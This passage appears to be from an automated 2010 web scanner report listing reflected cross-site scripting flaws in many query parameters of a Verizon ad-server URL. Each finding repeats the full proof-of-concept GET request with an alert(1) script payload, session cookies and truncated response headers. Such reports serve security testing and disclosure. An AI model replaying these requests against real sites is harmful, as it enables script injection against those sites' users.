This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=7caf7"><script>alert(1)</script>50a54869684&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:01 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the popdma request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1da7f"><script>alert(1)</script>dd21dfded12 was submitted in the popdma parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=1da7f"><script>alert(1)</script>dd21dfded12&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:03 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the popindicator request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d09c"><script>alert(1)</script>fd46850320a was submitted in the popindicator parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=1d09c"><script>alert(1)</script>fd46850320a&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:12:51 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the popip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7047a"><script>alert(1)</script>d1e5424609b was submitted in the popip parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.2187047a"><script>alert(1)</script>d1e5424609b&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:12:49 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the popservice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b4c"><script>alert(1)</script>f168f1782af was submitted in the popservice parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=46b4c"><script>alert(1)</script>f168f1782af&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:05 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the popstate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67eb7"><script>alert(1)</script>25f6305b55d was submitted in the popstate parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=67eb7"><script>alert(1)</script>25f6305b55d&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:12:57 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the popzipcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9011"><script>alert(1)</script>883683fd3b3 was submitted in the popzipcode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=a9011"><script>alert(1)</script>883683fd3b3&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:12:59 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the prizm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69473"><script>alert(1)</script>59a6c993841 was submitted in the prizm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=69473"><script>alert(1)</script>59a6c993841&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:10 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the pts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bff5"><script>alert(1)</script>2291f6d753d was submitted in the pts parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=9bff5"><script>alert(1)</script>2291f6d753d&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:43 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the pws request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c02f"><script>alert(1)</script>7422fc85b1a was submitted in the pws parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=2c02f"><script>alert(1)</script>7422fc85b1a&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:30 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4daa"><script>alert(1)</script>d5404341735 was submitted in the search parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=e4daa"><script>alert(1)</script>d5404341735 HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:14:05 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the sec_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 577c7"><script>alert(1)</script>7bd9773acc was submitted in the sec_email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=577c7"><script>alert(1)</script>7bd9773acc&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:53 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the smb_enh_msg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec203"><script>alert(1)</script>f54ed3ebb44 was submitted in the smb_enh_msg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=ec203"><script>alert(1)</script>f54ed3ebb44&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:14:01 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the smb_premmail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dcbc"><script>alert(1)</script>588a49e61fd was submitted in the smb_premmail parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=7dcbc"><script>alert(1)</script>588a49e61fd&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:50 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the usertype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3855"><script>alert(1)</script>424effc9656 was submitted in the usertype parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=e3855"><script>alert(1)</script>424effc9656&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:12 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the vasonly request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55b7c"><script>alert(1)</script>5aa14f10290 was submitted in the vasonly parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=55b7c"><script>alert(1)</script>5aa14f10290&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:21 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the vec request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91b9e"><script>alert(1)</script>c95b9106569 was submitted in the vec parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
